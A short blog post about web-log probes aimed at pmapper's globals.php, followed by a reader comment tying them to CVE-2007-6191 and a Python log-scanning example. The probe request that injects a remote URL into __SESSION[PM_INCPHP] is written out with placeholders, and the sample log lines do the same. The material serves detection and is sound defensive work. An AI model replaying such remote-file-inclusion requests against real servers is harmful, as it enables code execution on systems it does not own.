GET /<directory-path>/pmapper-3.2-beta3/incphp/globals.php?__SESSION[PM_INCPHP]=<some-url>?
where you replace the <directory-path> and the <some-url> with a path on your server and some random website respectively. It appears to be a probe to test for some vulnerability, but I don't have the full request logged, only the request up to the question mark on the GET request, so the payload isn't logged. The changing URLs are probably to throw people off the scent.
I must confess, I had no idea what this "pmapper" application was before I observed these hits, nor do I have PHP installed on my webserver, but I figure if I mention it on this blog, an audience who may be able to investigate can do something.
Oh well, I have done my part.
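As an added example (not part of the original post): a small Python scan of access-log lines for the request shape described above, a query parameter whose value is an absolute URL, grouped by parameter name so the varying directory paths and URLs collapse into one probe. The log lines, addresses, hosts and the superglobal-name heuristic are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample lines (combined log format); addresses, paths and hosts are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2007:10:00:01 +0000] "GET /maps/pmapper-3.2-beta3/incphp/globals.php?__SESSION[PM_INCPHP]=http://example.org/x.txt? HTTP/1.1" 404 209
203.0.113.9 - - [10/Dec/2007:10:00:07 +0000] "GET /blog/pmapper-3.2-beta3/incphp/globals.php?__SESSION%5BPM_INCPHP%5D=http%3A%2F%2Fexample.net%2Fid.txt%3F HTTP/1.1" 404 209
198.51.100.7 - - [10/Dec/2007:10:01:12 +0000] "GET /index.html?ref=newsletter HTTP/1.1" 200 5120
198.51.100.8 - - [10/Dec/2007:10:02:30 +0000] "GET /search?q=http+status+codes HTTP/1.1" 200 812
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)')
URL_VALUE_RE = re.compile(r"^(?:https?|ftp)://", re.I)
# Assumed heuristic: parameter names shaped like a PHP superglobal array, as in the probe.
SUPERGLOBAL_RE = re.compile(r"^_+(?:SESSION|GET|POST|COOKIE|SERVER|REQUEST|FILES|ENV)\[|^GLOBALS\[")

def find_probes(log_text):
    """Return one record per query parameter whose decoded value is an absolute URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes both
            if URL_VALUE_RE.match(value):
                hits.append({"client": client, "path": path, "param": name, "url": value,
                             "superglobal": bool(SUPERGLOBAL_RE.match(name))})
    return hits

def summarize(hits):
    """Group by parameter name so varying paths and URLs collapse into one probe."""
    groups = defaultdict(lambda: {"clients": set(), "paths": set(), "urls": set()})
    for h in hits:
        for key, field in (("clients", "client"), ("paths", "path"), ("urls", "url")):
            groups[h["param"]][key].add(h[field])
    return {p: {k: len(v) for k, v in g.items()} for p, g in groups.items()}

if __name__ == "__main__":
    for param, counts in summarize(find_probes(SAMPLE_LOG)).items():
        print(param, counts)
```

Grouping on the decoded parameter name matters here because the percent-encoded and literal forms of `__SESSION[PM_INCPHP]` would otherwise be counted as different requests.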
1 comment:
Antony,
The security vulnerability that folks are trying to exploit on your site is explained here:
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-6191
Hope that helps you and others!
-Sheeri